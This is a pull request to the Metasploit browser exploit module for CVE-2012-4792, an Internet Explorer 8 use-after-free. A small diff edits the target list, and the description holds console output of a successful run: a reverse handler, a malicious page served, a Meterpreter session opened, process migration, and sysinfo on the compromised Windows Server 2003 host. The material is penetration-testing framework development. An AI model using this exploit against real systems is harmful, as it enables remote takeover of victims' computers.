### PR TITLE
ie_cdwnbindinfo_uaf - CVE-2012-4792 - Added Windows Server 2003

### DIFF
--- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'IE 8 on Windows XP SP3',       { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
 					[ 'IE 8 on Windows Vista',        { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
 					[ 'IE 8 on Windows Server 2003',  { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
-					[ 'IE 8 on Windows 7',            { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
+					[ 'IE 8 on Windows 7',            { 'Rop' => :jre,    'Offset' => '0x586' } ]  # 0x0c0c0b30
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Dec 27 2012",


### PR DESCRIPTION
Added Windows Server 2003 to the Target List (IE8 with compatibility mode disabled).

```
msf  exploit(ie_cdwnbindinfo_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on XX.XX.XX.XX:4444
msf  exploit(ie_cdwnbindinfo_uaf) > [*] Using URL: https://0.0.0.0:443/test
[*]  Local IP: https://XX.XX.XX.XX:443/test
[*] Server started.
[*] XX.XX.XX.XX    ie_cdwnbindinfo_uaf - Requesting: /test.html
[*] XX.XX.XX.XX    ie_cdwnbindinfo_uaf - Target selected as: IE 8 on Windows Server 2003
[*] XX.XX.XX.XX    ie_cdwnbindinfo_uaf - Using JRE ROP
[*] XX.XX.XX.XX    ie_cdwnbindinfo_uaf - Sending HTML...
[*] Sending stage (752128 bytes) to XX.XX.XX.XX
[*] Meterpreter session 2 opened (XX.XX.XX.XX:4444 -> XX.XX.XX.XX:4199) at 2012-12-30 11:33:53 +0100
[*] Session ID 2 (XX.XX.XX.XX:4444 -> XX.XX.XX.XX:4199) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (30108)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 432
[+] Successfully migrated to process
msf  exploit(ie_cdwnbindinfo_uaf) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : XXXXXX
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
